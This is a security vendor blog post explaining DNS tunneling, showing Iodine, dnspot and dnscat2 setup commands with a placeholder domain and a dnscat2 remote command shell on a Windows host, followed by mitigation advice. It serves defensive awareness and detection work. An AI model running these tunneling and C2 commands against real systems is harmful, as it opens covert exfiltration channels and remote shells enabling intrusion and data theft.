A Netskope foi reconhecida como líder novamente no Quadrante Mágico do Gartner®™ para plataformas SASE. Obtenha o relatório

fechar
fechar
Sua Rede do Amanhã
Sua Rede do Amanhã
Planeje seu caminho rumo a uma rede mais rápida, segura e resiliente projetada para os aplicativos e usuários aos quais você oferece suporte.
          Experimente a Netskope
          Coloque a mão na massa com a plataforma Netskope
          Esta é a sua chance de experimentar a plataforma de nuvem única do Netskope One em primeira mão. Inscreva-se em laboratórios práticos e individualizados, junte-se a nós para demonstrações mensais de produtos ao vivo, faça um test drive gratuito do Netskope Private Access ou participe de workshops ao vivo conduzidos por instrutores.
            Líder em SSE. Agora é líder em SASE de fornecedor único.
            A Netskope é reconhecida como a líder mais avançada em visão para as plataformas SSE e SASE
            2X é líder no Quadrante Mágico do Gartner® para plataformas SASE
            Uma plataforma unificada criada para sua jornada
              Protegendo a IA generativa para leigos
              Protegendo a IA generativa para leigos
              Saiba como sua organização pode equilibrar o potencial inovador da IA generativa com práticas robustas de segurança de dados.
                E-book moderno sobre prevenção de perda de dados (DLP) para leigos
                Prevenção Contra Perda de Dados (DLP) Moderna para Leigos
                Obtenha dicas e truques para fazer a transição para um DLP fornecido na nuvem.
                  Livro SD-WAN moderno para SASE Dummies
                  SD-WAN moderno para leigos em SASE
                  Pare de brincar com sua arquitetura de rede
                    Compreendendo onde estão os riscos
                    O Advanced Analytics transforma a maneira como as equipes de operações de segurança aplicam insights orientados por dados para implementar políticas melhores. Com o Advanced Analytics, o senhor pode identificar tendências, concentrar-se em áreas de preocupação e usar os dados para tomar medidas.
                        Os 6 casos de uso mais atraentes para substituição completa de VPN herdada
                        Os 6 casos de uso mais atraentes para substituição completa de VPN herdada
                        O Netskope One Private Access é a única solução que permite que o senhor aposente sua VPN definitivamente.
                          A Colgate-Palmolive protege sua “propriedade intelectual "” com proteção de dados inteligente e adaptável
                          A Colgate-Palmolive protege sua “propriedade intelectual "” com proteção de dados inteligente e adaptável
                            Netskope GovCloud
                            Netskope obtém alta autorização do FedRAMP
                            Escolha o Netskope GovCloud para acelerar a transformação de sua agência.
                              Vamos fazer grandes coisas juntos
                              A estratégia de comercialização da Netskope, focada em Parcerias, permite que nossos Parceiros maximizem seu crescimento e lucratividade enquanto transformam a segurança corporativa.
                                ""
                                Netskope Cloud Exchange
                                O Netskope Cloud Exchange (CE) oferece aos clientes ferramentas de integração poderosas para alavancar os investimentos em toda a postura de segurança.
                                  Suporte Técnico Netskope
                                  Suporte Técnico Netskope
                                  Nossos engenheiros de suporte qualificados estão localizados em todo o mundo e têm diversas experiências em segurança de nuvem, rede, virtualização, fornecimento de conteúdo e desenvolvimento de software, garantindo assistência técnica de qualidade e em tempo hábil.
                                    Vídeo da Netskope
                                    Treinamento Netskope
                                    Os treinamentos da Netskope vão ajudar você a ser um especialista em segurança na nuvem. Conte conosco para ajudá-lo a proteger a sua jornada de transformação digital e aproveitar ao máximo as suas aplicações na nuvem, na web e privadas.

                                      DNS Tunneling: The Blind Spot in Your Network Security Strategy

                                      Aug 26 2025

                                      Summary

                                      The Domain Name System (DNS) is a critical component of internet infrastructure, responsible for translating human-readable domain names into IP addresses. However, the ubiquitous nature and often-overlooked security aspects of DNS make it a prime target for malicious actors. 

                                      This blog post investigates the tools used for data exfiltration over DNS, the techniques involved, and the countermeasures to mitigate these threats. 

                                      Key takeaways

                                      DNS tunneling is a stealthy and increasingly common method for data exfiltration and command-and-control. This article aims to raise awareness of how attackers exploit DNS and what defenders can do to disrupt that activity. Here are some of the key takeaways:

                                      • Enforce DNS resolver control to prevent unauthorized or malicious queries.
                                      • Monitor for abnormal DNS patterns indicative of tunneling or malware activity.
                                      • Inspect and filter DNS traffic to block suspicious or newly observed domains early.

                                      Details

                                      Primarily intended for domain name resolution, DNS is frequently permitted through firewalls, rendering it a desirable clandestine communication medium. Adversaries may tunnel data and command-and-control (C2) directives within seemingly valid DNS queries and replies. Consequently, DNS and affiliated protocols are increasingly employed for nefarious activities. Therefore, understanding the potential for abuse within DNS-related protocols is just as crucial as monitoring traditional web traffic for malicious activity.

                                      Commonly used and abused DNS record types:

                                      Record TypeDescription
                                      AStores an IPv4 address
                                      AAAAStores an IPv6 address
                                      MXMail exchanger
                                      CNAMEAn alias for another domain name
                                      TXTStores a text string

                                      The table above shows several DNS record types that are being abused. For example, the TXT record type is often used to prove domain ownership through challenge responses, with specific TXT records being populated like:

                                      ; QUESTION SECTION:
                                      ;_acme-challenge.example.com. IN TXT
                                      ;; ANSWER SECTION:
                                      _acme-challenge.example.com. 3600 IN TXT "TglI7jzpo9O4q7VUkMAutwBuBAjhPSt..."

                                      This flexibility in record content, especially in types like TXT, which can store arbitrary strings, makes them attractive for embedding encoded payloads. Additionally, query subdomains in A or AAAA requests can carry outbound data, while the responses can contain instructions or data fragments for the recipient. The inherent structure of DNS traffic, combined with its permissiveness across most networks, creates an ideal channel for covert communication and data exfiltration.

                                      A range of tools has emerged to exploit these characteristics. Some were originally built to provide connectivity in restrictive environments, while others are designed with offensive operations in mind. Notable examples of such tools include Iodine, dnspot, and dnscat2, each employing distinct techniques to exploit DNS for data tunneling or command-and-control communication.

                                      ToolSupported DNS Record TypesMain Features
                                      IodineA, CNAME, MX, NULL, PRIVATE, SRV, TXTIP-level tunneling
                                      dnspotA, CNAME, OPTChat and C2
                                      dnscat2A, AAAA, CNAME, MX, TXTTunneling and C2

                                      Tunneling over DNS with Iodine

                                      Iodine is a tool that enables the tunneling of IPv4 data through a DNS server. This is particularly useful in scenarios where a firewall restricts internet access but permits DNS queries.

                                      Iodine server

                                      As the client communicates directly with the server, the domain used doesn’t have to be owned by the attacker or even exist. In the following example, a fake domain iodine.domain.not.exist was used.

                                      Iodine client

                                      After the connection has been established, a virtual interface, dns0, is created. The client can now reach the server using its private IP address, such as:

                                      $  wget http://10.10.10.10/secret.txt

                                      Iodine supports various DNS record types, such as A, TXT, MX, and CNAME. The packet trace revealed the use of non-printable characters in DNS queries, as shown in the screenshot below.

                                      Visualizations of communications during tunnel idling showed the client communicating with the server at a fixed frequency, as depicted in the picture below.

                                      Chat over DNS with dnspot

                                      dnspot is a tool that enables covert communication by tunneling data through DNS queries and responses. It can be used to exfiltrate data or establish command-and-control channels in environments where traditional network traffic is restricted. We’ll be using its *chat* mode to send messages from the client to the server.

                                      Server running in *chat* mode:

                                      $ ./dnspot-server-linux generate
                                      public key: eskfpbyb6jfnwz06o701ki53btpwaviya68ar41l85b98e1zjb
                                      private key: 1cw3o8b7ga8wlmbhe4ws7pxx3lbqpv9bo8zaeugtdl7zumq40c
                                      !quit to exit
                                      > !quit


                                      $ sudo ./dnspot-server-linux --dnsSuffix domain.not.exist --privateKey 1cw3o8b7ga8wlmbhe4ws7pxx3lbqpv9bo8zaeugtdl7zumq40c --mode chat
                                      !quit to exit
                                      >

                                      Client sending chat messages:

                                      > dnspot-agent-windows.exe  --dnsSuffix domain.not.exist  --serverPublicKey eskfpbyb6jfnwz06o701ki53btpwaviya68ar41l85b98e1zjb  --serverAddress <ServerIP>:53

                                      Press Ctrl+D to exit
                                      -> Hello from the client machine ;b
                                      ->

                                      Messages received by the server:

                                      > [czm3e64p5u0f5q4difialyv48uo4cv20dk764eyedk2quzho8n]: Hello from the client machine ;b
                                      ->

                                      Packet traces

                                      An extremely long hostname in DNS traffic can be observed in the screenshot below:

                                      C2 over DNS with dnscat2

                                      dnscat2 is a powerful tool that enables command-and-control (C2) communication over the seemingly innocuous DNS traffic. This technique allows attackers to establish covert channels, bypassing traditional firewall rules that often permit DNS traffic. By tunneling command and data within DNS queries and responses, dnscat2 provides a stealthy and persistent backdoor into compromised systems.

                                      dnscat2 server

                                      $ sudo dnscat2-server domain.not.exist

                                      Or use its Docker image to run it if an RCODE_NAME_ERROR is encountered.

                                      $ docker run --rm -it --privileged -p 53:53/udp -e DOMAIN_NAME="domain.not.exist" --name dnscat2 arno0x0x/dnscat2

                                      dnscat2 client

                                      $ dnscat --dns domain=domain.not.exist,server=<server_ip>,type=TXT

                                      Creating DNS driver:
                                      domain = domain.not.exist
                                      host = 0.0.0.0
                                      port = 53
                                      type = TXT
                                      server = ...

                                      Encrypted session established! For added security, please verify the server also displays this string:

                                      Poxes Story Peace Harp Lordy Flacks

                                      Session established!

                                      Once the client connects to the server, the attacker can interact with the client machine through the dnscat2> prompt:

                                      dnscat2>
                                      New window created: 1
                                      Session 1 security: ENCRYPTED BUT *NOT* VALIDATED
                                      For added security, please ensure the client displays the same string:
                                      >> Poxes Story Peace Harp Lordy Flacks
                                      dnscat2>
                                      dnscat2>
                                      windows
                                      0 :: main [active]
                                      crypto-debug :: Debug window for crypto stuff [*]
                                      dns1 :: DNS Driver running on 0.0.0.0:53 domains = domain.not.exist [*]
                                      1 :: command (winvic99) [encrypted, NOT verified] [*]
                                      dnscat2> window -i 1
                                      New window created: 2
                                      Session 2 security: ENCRYPTED BUT *NOT* VALIDATED
                                      For added security, please ensure the client displays the same string:
                                      >> Shirks Abate Winful Sonny Wages Ripe
                                      dnscat2>
                                      window -i 2
                                      New window created: 2
                                      history_size (session) => 1000
                                      Session 2 security: ENCRYPTED BUT *NOT* VALIDATED
                                      For added security, please ensure the client displays the same string:
                                      >> Shirks Abate Winful Sonny Wages Ripe
                                      This is a console session!
                                      That means that anything you type will be sent as-is to the
                                      client, and anything they type will be displayed as-is on the
                                      screen! If the client is executing a command and you don't
                                      see a prompt, try typing 'pwd' or something!
                                      To go back, type ctrl-z.
                                      Microsoft Windows [Version 10.0.20348.1668]
                                      (c) Microsoft Corporation. All rights reserved.


                                      C:\Users\Administrator\Downloads>whoami
                                      cmd.exe (winvic99) 3>
                                      whoami
                                      winvic99\administrator


                                      C:\Users\Administrator\Downloads>
                                      dir c:\
                                      cmd.exe (winvic99) 2> dir c:\
                                      Volume in drive C has no label.
                                      Volume Serial Number is 702E-4043
                                      Directory of c:\
                                      11/02/2024 03:57 AM 12,288 DumpStack.log
                                      08/19/2021 06:24 AM <DIR> EFI
                                      05/14/2024 05:41 AM 0 log.txt
                                      05/08/2021 08:20 AM <DIR> PerfLogs
                                      03/01/2025 01:43 PM <DIR> Program Files
                                      04/16/2025 10:52 PM <DIR> Program Files (x86)
                                      01/08/2025 03:20 AM <DIR> Python27
                                      04/17/2023 12:29 PM <DIR> Users
                                      04/16/2025 10:52 PM <DIR> Windows
                                      2 File(s) 12,288 bytes
                                      7 Dir(s) 8,261,951,488 bytes free
                                      C:\Users\Administrator\Downloads>

                                      Packet Traces

                                      Consecutive hexadecimal patterns can be observed in the hostname part of the FQDN.

                                      The periodic use of specific query types, like TXT, was observed in the diagram below when the C2 session idled.

                                      Mitigation

                                      DNS tunneling is a stealthy and increasingly common method for data exfiltration and command-and-control. Here’s what we recommend to mitigate these threats:

                                      • Limit DNS access to approved resolvers: Restrict outbound DNS queries to a tightly controlled list of trusted resolvers.  This helps reduce the attack surface and prevents unauthorized DNS traffic that could be used for tunneling or evasion.  In the three examples discussed in this article, the client communicates directly with the target DNS server, querying fully qualified domain names (FQDNs) under a non-existent domain – domain.not.exist.
                                      • Leverage anomaly detection on DNS queries: Monitor for unusual patterns in DNS query names, such as high-entropy strings, excessive length, or non-standard character sets.  These anomalies often indicate tunneling behavior or domain generation algorithms (DGAs) used by malware.
                                      • Inspect DNS traffic via proxies or filters: Route DNS queries through security appliances or proxies that can perform deep inspection.  Focus on identifying newly registered domains (NRDs), newly observed domains (NODs), and known malicious domains to catch early-stage threats before they succeed.

                                      References

                                      • https://github.com/yarrick/iodine
                                      • https://github.com/mosajjal/dnspot
                                      • https://github.com/iagox86/dnscat2

                                      Netskope Detection

                                      Block events will be raised with threat type dns_tunnel when Block All DNS Tunnels is enabled in DNS profiles. See https://docs.netskope.com/en/dns-profile/ for best practices.

                                      Conclusions

                                      DNS-based tunneling is a stealthy threat, leveraging a seemingly benign protocol for malicious communication. Detecting and disrupting these hidden channels requires vigilance and proactive security measures, including strict DNS controls and anomaly detection. Understanding this attack vector is crucial for defending against sophisticated cyber threats in our increasingly interconnected world.

                                      author image
                                      Hubert Lin
                                      Hubert Lin’s recent focus is offensive security. He also holds certificates in Red Hat Certified Engineer (RHCE), and Offensive Security Certified Professional (OSCP).
                                      Hubert Lin’s recent focus is offensive security. He also holds certificates in Red Hat Certified Engineer (RHCE), and Offensive Security Certified Professional (OSCP).
                                      Conecte-se com a Netskope

                                      Subscribe to the Netskope Blog

                                      Sign up to receive a roundup of the latest Netskope content delivered directly in your inbox every month.